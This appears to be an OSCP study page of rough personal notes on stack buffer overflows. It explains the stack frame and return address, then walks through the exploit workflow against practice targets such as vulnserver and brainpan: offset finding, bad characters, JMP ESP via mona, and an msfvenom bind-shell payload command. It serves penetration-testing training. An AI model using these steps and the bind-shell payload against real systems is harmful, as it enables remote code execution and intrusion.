OSCP
Search…
Study about buffer overflow
Buffer overflow
Crash The Application Find EIP Control ESP Identify Bad Characters Find JMP ESP Generate Shell Code Exploit
Definitions: EIP - The Extended Instruction Pointer (EIP) is a register that contains the address of the next instruction for the program or command. ESP – The Extended Stack Pointer (ESP) is a register that lets you know where on the stack you are and allows you to push data in and out of the application. JMP – The Jump (JMP) is a register that performs an unconditional jump to transfer the flow of execution by changing the EIP register. \x41, \x42, \x43 - The hexadecimal values for A, B and C. For this exercise, there is no benefit to using hex vs ascii, it's just my personal preference.
======================================================= Buffer overflow
stack demo
0040153B 0040156B
high to low memory lifo
value add in the stack (function) 11223344 the address of the next instruction is also put on the stack because when we take back address in to EIP (Instruction pointer) and continue the journey
return address is also put on the stack, this happen when call is execute
00401565 - return address
EBP Register (frame pointer) base pointer
push ebp
winding and unwinding
leave
when retun addres then eip is same
the return address is now popped
left pane - dissassemble of the binary right pane - cpu registers left bottom pane - memory dump right bottom pane- stack
pushing the value return address ebp local variables
frame pointer - ebp (current value of the ebp register)
after leaving - frame pointer has been popped from the stack after that return address popped out in to EIP register , and now eip register is pointing to next call
==================================================
stack winding and unwinding - 2
main - f1,f2,f3
push argument on the stack then push return address push ebp (frame pointer) [current value of the EBP value in to stack]
then again 2nd function 222222 push return address then push ebp frame pointer
after pushing and then winding start
==================================================
tampering the return address
value modified in stack then retn address redirect to should not execute function [after checking the value exit process then it will not crash] changed the address and point to that function
=================================================
returning in to shellcode
msfvenom -p windows/shell_bind_tcp -f c
shellcode address found in memory address then run it . it iwll open 4444 port then attacker able to connect it...
================================================
concept 1 - to understand the push the argument, return address, ebp, local variables winding and unwinding concept 2 - able to modify the return address value on the stack. concept 3 - mangae to put the program in the code then its possible to redirect the return address in to shellcode
===============================================
overwriting the stack with user input
gets(buffer)
char buffer[1] gets(buffer) print(buffer);
stack run with high memory to low memory [down to up] function gets end up writing low memory to high memory
overwrite stack
gets the input from the user print the user details
minishare, vulnserver, slmail xp32 sp 2
priv - gomitk window - fuzzysecurity
after chapter 6
============================================= overwriting the stack remotely
140 windows 141 brainpan
first sending random a then applicaation will crash
then patter create.rb -l 1000 measploit """
EIP - 35724134
patter offset - 524
"A" 524 + "B" 4 + "C" * 100
EIP - 42
EOX - 4141414
ESP - C 4242
badcharacters add in python file
replace c in to badchars
esp follow in dump
04, 05 , 54,55 , b0
remove bad characters from exploit file
bad characters find and remove it from python file
need jmp esp
!mona modules
find jmp esp - 311712F3
esp write in to code opposite value Az
Last modified 2yr ago
Copy link